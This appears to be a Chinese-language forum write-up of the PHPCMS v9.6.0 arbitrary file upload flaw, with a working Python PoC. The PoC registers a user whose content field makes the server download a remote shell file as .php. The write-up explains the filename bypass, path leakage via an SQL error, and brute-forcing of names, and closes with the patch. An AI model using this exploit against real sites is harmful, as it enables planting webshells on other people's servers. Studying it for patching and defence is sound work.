PHPCMS v9.6.0 任意文件上传漏洞分析及如何利用详解

yun

0x00 漏洞概述漏洞简介

前几天 phpcms v9.6 的任意文件上传的漏洞引起了安全圈热议，通过该漏洞攻击者可以在未授权的情况下任意文件上传，影响不容小觑。phpcms官方今天发布了9.6.1版本，对漏洞进行了补丁修复.

漏洞影响

任意文件上传

0x01 漏洞复现

本文从 PoC 的角度出发，逆向的还原漏洞过程，若有哪些错误的地方，还望大家多多指教。

首先我们看简化的 PoC ：

1. import re
   
2. import requests
   
3. 
   
4. 
   
5. def poc(url):
   
6.     u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
   
7.     data = {
   
8.         'siteid': '1',
   
9.         'modelid': '1',
   
10.         'username': 'test',
    
11.         'password': 'testxx',
    
12.         'email': 'test@test.com',
    
13.         'info[content]': '<img src=http://url/shell.txt?.php#.jpg>',
    
14.         'dosubmit': '1',
    
15.     }
    
16.     rep = requests.post(u, data=data)
    
17. 
    
18.     shell = ''
    
19.     re_result = re.findall(r'<img src=(.*)>', rep.content)
    
20.     if len(re_result):
    
21.         shell = re_result[0]
    
22.         print shell

复制代码

可以看到 PoC 是发起注册请求，对应的是phpcms/modules/member/index.php中的register函数，所以我们在那里下断点，接着使用 PoC 并开启动态调试，在获取一些信息之后，函数走到了如下位置：

通过 PoC 不难看出我们的 payload 在$_POST['info']里，而这里对$_POST['info']进行了处理，所以我们有必要跟进。

在使用new_html_special_chars对<>进行编码之后，进入$member_input->get函数，该函数位于caches/caches_model/caches_data/member_input.class.php中，接下来函数走到如下位置：

由于我们的 payload 是info[content]，所以调用的是editor函数，同样在这个文件中：

接下来函数执行$this->attachment->download函数进行下载，我们继续跟进，在phpcms/libs/classes/attachment.class.php中：

1. function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '')
   
2. {
   
3.     global $image_d;
   
4.     $this->att_db = pc_base::load_model('attachment_model');
   
5.     $upload_url = pc_base::load_config('system','upload_url');
   
6.     $this->field = $field;
   
7.     $dir = date('Y/md/');
   
8.     $uploadpath = $upload_url.$dir;
   
9.     $uploaddir = $this->upload_root.$dir;
   
10.     $string = new_stripslashes($value);
    
11.     if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $string, $matches)) return $value;
    
12.     $remotefileurls = array();
    
13.     foreach($matches[3] as $matche)
    
14.     {
    
15.         if(strpos($matche, '://') === false) continue;
    
16.         dir_create($uploaddir);
    
17.         $remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref);
    
18.     }
    
19.     unset($matches, $string);
    
20.     $remotefileurls = array_unique($remotefileurls);
    
21.     $oldpath = $newpath = array();
    
22.     foreach($remotefileurls as $k=>$file) {
    
23.         if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue;
    
24.         $filename = fileext($file);
    
25.         $file_name = basename($file);
    
26.         $filename = $this->getname($filename);
    
27. 
    
28.         $newfile = $uploaddir.$filename;
    
29.         $upload_func = $this->upload_func;
    
30.         if($upload_func($file, $newfile)) {
    
31.             $oldpath[] = $k;
    
32.             $GLOBALS['downloadfiles'][] = $newpath[] = $uploadpath.$filename;
    
33.             @chmod($newfile, 0777);
    
34.             $fileext = fileext($filename);
    
35.             if($watermark){
    
36.                 watermark($newfile, $newfile,$this->siteid);
    
37.             }
    
38.             $filepath = $dir.$filename;
    
39.             $downloadedfile = array('filename'=>$filename, 'filepath'=>$filepath, 'filesize'=>filesize($newfile), 'fileext'=>$fileext);
    
40.             $aid = $this->add($downloadedfile);
    
41.             $this->downloadedfiles[$aid] = $filepath;
    
42.         }
    
43.     }
    
44.     return str_replace($oldpath, $newpath, $value);
    
45. }

复制代码

函数中先对$value中的引号进行了转义，然后使用正则匹配：

1. $ext = 'gif|jpg|jpeg|bmp|png';
   
2. ...
   
3. $string = new_stripslashes($value);
   
4. if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i",$string, $matches)) return $value;

复制代码

这里正则要求输入满足src/href=url.(gif|jpg|jpeg|bmp|png)，我们的 payload （<img src=http://url/shell.txt?.php#.jpg>）符合这一格式（这也就是为什么后面要加.jpg的原因）。

接下来程序使用这行代码来去除 url 中的锚点：$remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref);，处理过后$remotefileurls的内容如下：

可以看到#.jpg被删除了，正因如此，下面的$filename = fileext($file);取的的后缀变成了php，这也就是 PoC 中为什么要加#的原因：把前面为了满足正则而构造的.jpg过滤掉，使程序获得我们真正想要的php文件后缀。

我们继续执行：

程序调用copy函数，对远程的文件进行了下载，此时我们从命令行中可以看到文件已经写入了：

shell 已经写入，下面我们就来看看如何获取 shell 的路径，程序在下载之后回到了register函数中：

可以看到当$status > 0时会执行 SQL 语句进行 INSERT 操作，具体执行的语句如下：

也就是向v9_member_detail的content和userid两列插入数据，我们看一下该表的结构：

因为表中并没有content列，所以产生报错，从而将插入数据中的 shell 路径返回给了我们：

上面我们说过返回路径是在$status > 0时才可以，下面我们来看看什么时候$status <= 0，在phpcms/modules/member/classes/client.class.php中：

几个小于0的状态码都是因为用户名和邮箱，所以在 payload 中用户名和邮箱要尽量随机。

另外在 phpsso 没有配置好的时候$status的值为空，也同样不能得到路径。

在无法得到路径的情况下我们只能爆破了，爆破可以根据文件名生成的方法来爆破：

仅仅是时间加上三位随机数，爆破起来还是相对容易些的。

0x02 补丁分析

phpcms 今天发布了9.6.1版本，针对该漏洞的具体补丁如下：

在获取文件扩展名后再对扩展名进行检测

具体的详解pdf文档下载： PHPCMSv9.6.0 任意文件上传漏洞.pdf (707.74 KB, 下载次数: 2, 售价: 5 黑币)

2017-4-25 22:00 上传

点击文件名下载附件
PHPCMSv9.6.0 任意文件上传漏洞
阅读权限: 10
售价: 5 黑币  [记录]  [购买]
下载积分: 黑币 -1

如何利用相关文件下载： phpcms-v960漏洞分析利用.zip (3.9 KB, 下载次数: 1, 售价: 6 黑币)

2017-4-25 22:00 上传

点击文件名下载附件
phpcms-v960漏洞分析利用
阅读权限: 10
售价: 6 黑币  [记录]  [购买]
下载积分: 黑币 -1